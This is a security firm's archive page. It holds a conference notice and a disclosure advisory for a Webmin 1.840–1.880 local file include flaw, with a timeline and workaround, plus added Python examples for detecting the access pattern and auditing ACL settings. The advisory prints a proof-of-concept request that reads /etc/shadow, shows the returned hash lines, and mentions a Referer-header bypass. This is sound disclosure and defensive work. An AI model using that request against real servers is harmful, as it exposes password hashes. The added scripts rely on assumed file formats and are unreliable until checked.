Archives for March 2018

International Conference of Big Data in Cyber Security

Our CEO, David Stubley, will be speaking in Edinburgh at the International Conference on Big Data in Cyber Security on 31st May 2018 at Napier University. With the threats to organisations increasing day by day, many organisations are adopting SIEM (Security Information and Event Management) to detect malicious activity. SIEM is now applied across the industry in many different processes, including security monitoring, incident response and cyber crime investigation.

The big data conference brings together industry, academia and law enforcement to share insights, ideas, expertise and resources in responding to current security challenges, and to look at the opportunities and challenges in managing and using big data in a cyber security context. The conference also aims to showcase good practice in industry and in network investigations.

The conference hopes to cover the following areas:

  • insights into current high-profile security incidents, their impact, and how they are reported.
  • impact of GDPR.
  • key threats and risks associated with losing business critical data.
  • leading tools, techniques and insights in network threat analysis, detection and investigation.
  • best practice in implementing SIEM strategy.
  • developing and testing effective incident response.
  • evolution of the Security Operations Centre (SOC) and its emerging future requirements.
  • the need for skills, knowledge and awareness across an organisation.
  • latest research and innovation around threat discovery, machine learning, and data analysis.

David Stubley will be discussing ‘threat hunting in the Office 365 ecosystem’ at 2 pm in the Lindsay Stewart Theatre.

If you would like to know more about how we approach incident response, then please get in touch with our team.

Webmin 1.840 – 1.880 – Unrestricted Access to Arbitrary Files using Local File Include

Advisory Information

Title: Webmin 1.840 – 1.880 – Unrestricted Access to Arbitrary Files Using Local File Include

Date Published: 14/03/2018

Advisory Summary

The application allows a restricted Linux user to obtain arbitrary local system files via a Local File Include vulnerability.

Vendor

Webmin

Affected Software

Product: Webmin
Version: 1.840 and 1.880

Description of Issue

In a default installation of Webmin 1.840/1.880, Webmin users whose underlying Unix accounts are restricted from reading root-owned or system files are nonetheless able to read those files through Webmin. As a result of weak default configuration settings, limited users have full read access to the underlying Unix filesystem, allowing them to read sensitive data from the local system such as ‘/etc/shadow’.

PoC

The following GET request shows the use of a direct URL to obtain local files through the Local File Include vulnerability:

GET /syslog/save_log.cgi?view=1&file=/etc/shadow HTTP/1.1
Host: 192.168.75.150:10000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
The Webmin application server responds with a ‘200 OK’ and includes the file normally restricted to limited users of the system:

HTTP/1.0 200 Document follows
Date: Thu, 8 Mar 2018 20:41:28 GMT
Server: MiniServ/1.880
Connection: close

proxy:*:17288:0:99999:7:::
www-data:*:17288:0:99999:7:::
mysql:!:17542:0:99999:7:::
opsview:!:17542::::::
nagios:!:17542::::::
snmp:*:17542:0:99999:7:::
admin:$1$**SNIP**/5sl29PP0a.:17542:0:99999:7:::


The following screenshot shows the web view display of the file loaded:
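As an added example (not part of the advisory and not Webmin code), the following Python detection logic hunts for this access pattern in Webmin's own access log rather than in the HTTP traffic: it parses miniserv.log-style lines, extracts the file= parameter from requests to /syslog/save_log.cgi, normalises the path and flags any read outside the expected log directory. The log lines are constructed for the example, and both the log format (Apache common-log style with the Webmin username in the third field) and the allowed directory list are assumptions to adjust for your installation.

```python
"""Flag Webmin System Logs requests that read files outside the log directory.

Added example, not part of the advisory or of Webmin. Log format and the
allowed directory list are assumptions; adjust them to your installation.
"""
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in the common-log style assumed for miniserv.log:
#   client - webmin_user [timestamp] "METHOD target HTTP/x" status bytes
SAMPLE_LOG = """\
192.168.75.1 - admin [08/Mar/2018:20:40:02 +0000] "GET /syslog/index.cgi HTTP/1.1" 200 5120
192.168.75.1 - admin [08/Mar/2018:20:41:28 +0000] "GET /syslog/save_log.cgi?view=1&file=/etc/shadow HTTP/1.1" 200 1234
192.168.75.1 - admin [08/Mar/2018:20:42:10 +0000] "GET /syslog/save_log.cgi?view=1&file=/var/log/syslog HTTP/1.1" 200 9000
192.168.75.1 - admin [08/Mar/2018:20:43:55 +0000] "GET /syslog/save_log.cgi?view=1&file=/var/log/../../etc/passwd HTTP/1.1" 200 2200
192.168.75.1 - admin [08/Mar/2018:20:44:12 +0000] "GET /syslog/save_log.cgi?view=1&file=%2Fetc%2Fshadow HTTP/1.1" 200 1234
192.168.75.1 - admin [08/Mar/2018:20:45:00 +0000] "GET /syslog/save_log.cgi?view=1&idx=0 HTTP/1.1" 200 3000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Directories a log viewer legitimately reads from (assumption; extend as needed).
ALLOWED_LOG_DIRS = ("/var/log",)


def requested_file(target):
    """Return the decoded file= parameter of a save_log.cgi request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/syslog/save_log.cgi"):
        return None
    values = parse_qs(parts.query).get("file")  # parse_qs percent-decodes the value
    return values[0] if values else None


def outside_log_dirs(path, allowed=ALLOWED_LOG_DIRS):
    """True if the normalised path is not under any allowed log directory."""
    norm = posixpath.normpath(path)  # collapses /var/log/../../etc/passwd to /etc/passwd
    return not any(norm == d or norm.startswith(d + "/") for d in allowed)


def find_arbitrary_reads(log_text):
    """Return (user, ip, normalised_file, status) for each out-of-scope read."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        requested = requested_file(m.group("target"))
        if requested is None:
            continue  # not a file= read via save_log.cgi
        norm = posixpath.normpath(requested)
        if outside_log_dirs(norm):
            hits.append((m.group("user"), m.group("ip"), norm, int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for user, ip, path, status in find_arbitrary_reads(SAMPLE_LOG):
        print(f"{user}@{ip} read {path} via save_log.cgi (HTTP {status})")
```

Reads of /var/log/syslog are left alone; /etc/shadow, the URL-encoded %2Fetc%2Fshadow and the /var/log/../../etc/passwd traversal are all reported after decoding and normalisation. A 200 status on a flagged line is the signal that the restriction was not enforced, which is exactly the response shown above.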

Webmin default configuration

A number of settings in the Webmin administrator control panel can restrict users from accessing sensitive system files. However, these settings are not enforced by default when a new installation of Webmin 1.840/1.880 is deployed. Of specific note is the System Logs module option that allows any file to be viewed as a log file, which defaults to ‘Yes’. This allows a restricted user to load sensitive system files via the Local File Include function of the web application.

Remediation

The issue has not been patched yet.

Workaround

Administrators of Webmin servers should manually set the following access control option within the configuration to protect sensitive system files from being read by otherwise restricted users.

Webmin > Webmin Users > Webmin Groups > Select Group  > Available Webmin Modules > System Logs

  • Can view any files as a log? – ‘No’
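To check existing installations for the weak setting without clicking through every user and group in the control panel, here is an added Python example (not Webmin's own code). It assumes that Webmin stores the System Logs module ACLs as key=value files under /etc/webmin/syslog/ (<user>.acl, <group>.gacl and the defaultacl template applied to new users) and that ‘Can view any files as a log?’ maps to the key any (any=1 for ‘Yes’); confirm the key name against your installation before relying on it. The sample ACL files are constructed in a temporary directory so the example runs offline.

```python
"""Audit Webmin System Logs module ACLs for "Can view any files as a log?".

Added example, not Webmin's own code. Assumed layout: key=value ACL files
under /etc/webmin/syslog/ named <user>.acl, <group>.gacl and defaultacl,
with the setting stored as the key "any" (1 = yes). Verify before use.
"""
import tempfile
from pathlib import Path

ACL_KEY = "any"                # assumed key name for "Can view any files as a log?"
ACL_DIR = "/etc/webmin/syslog"  # assumed module directory on a real host


def parse_acl(text):
    """Parse a key=value ACL file into a dict, skipping blank and comment lines."""
    acl = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        acl[key.strip()] = value.strip()
    return acl


def is_acl_file(path):
    """ACL files are <user>.acl, <group>.gacl and the defaultacl template."""
    return path.is_file() and (path.name == "defaultacl" or path.suffix in (".acl", ".gacl"))


def audit_syslog_acls(module_dir=ACL_DIR):
    """Return the names of ACL files that grant 'any file as a log' (any=1)."""
    weak = []
    for path in sorted(Path(module_dir).iterdir()):
        if is_acl_file(path) and parse_acl(path.read_text()).get(ACL_KEY) == "1":
            weak.append(path.name)
    return weak


def harden_acl(text):
    """Return the ACL text with any=0, rewriting the key in place or appending it."""
    out, found = [], False
    for line in text.splitlines():
        if line.split("=", 1)[0].strip() == ACL_KEY:
            out.append(f"{ACL_KEY}=0")
            found = True
        else:
            out.append(line)
    if not found:
        out.append(f"{ACL_KEY}=0")
    return "\n".join(out) + "\n"


def demo():
    """Audit a constructed /etc/webmin/syslog lookalike before and after hardening."""
    with tempfile.TemporaryDirectory() as tmp:
        samples = {  # constructed sample files, not real Webmin output
            "defaultacl": "noconfig=0\nany=1\nsyslog=1\n",   # template: the weak default
            "limited.acl": "noconfig=1\nany=1\nsyslog=0\n",  # restricted user, still any=1
            "ops.gacl": "any=0\n",                            # group already hardened
            "config": "syslog_conf=/etc/rsyslog.conf\n",      # module config, not an ACL
        }
        for name, body in samples.items():
            Path(tmp, name).write_text(body)
        before = audit_syslog_acls(tmp)
        for name in before:
            path = Path(tmp, name)
            path.write_text(harden_acl(path.read_text()))
        after = audit_syslog_acls(tmp)
        return before, after


if __name__ == "__main__":
    before, after = demo()
    print("weak before:", before)
    print("weak after: ", after)
```

Run the audit read-only first (audit_syslog_acls() against the live directory as root) and make the change itself through the control panel path given above, which is the supported route; note that tightening defaultacl only affects users created afterwards, so every existing .acl and .gacl file has to be checked as well.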

Timeline

  • Initial email contact to vendor via security email address noted on website – 8th March 2018.

  • Email reply from Webmin explaining that Webmin users have root-equivalent access to the underlying system, and advising that the directories users can access via Webmin be restricted – 9th March 2018.

  • Email reply to Webmin advising that the measures described in the previous reply do not limit access to restricted files, with a simplified walkthrough of the issue – 9th March 2018.

  • Further email to Webmin explaining that “Can view any file as a log” is the only setting that prevents restricted users from viewing arbitrary files via Webmin – 9th March 2018.

  • Additional email to Webmin explaining that the ‘referer_none=1’ default setting, which prohibits access on default installations of Webmin, can be bypassed using the Referer HTTP header – 9th March 2018.

  • Email reply from Webmin confirming that the setting “Can view any files as a log” will prohibit user access to sensitive files – 9th March 2018.

  • Email to Webmin explaining that the issue exists in version 1.880, that it is advisable to change the default configuration of Webmin to restrict the setting “Can view any file as a log”, and that a blog post will be made available to the wider community informing them of the issue so that system administrators can protect their systems against arbitrary file access – 10th March 2018.

  • Reply from Webmin agreeing that permissions in Webmin differ from what you would expect on Linux and that a blog post would be useful – 11th March 2018.

  • Advisory Released – 14th March 2018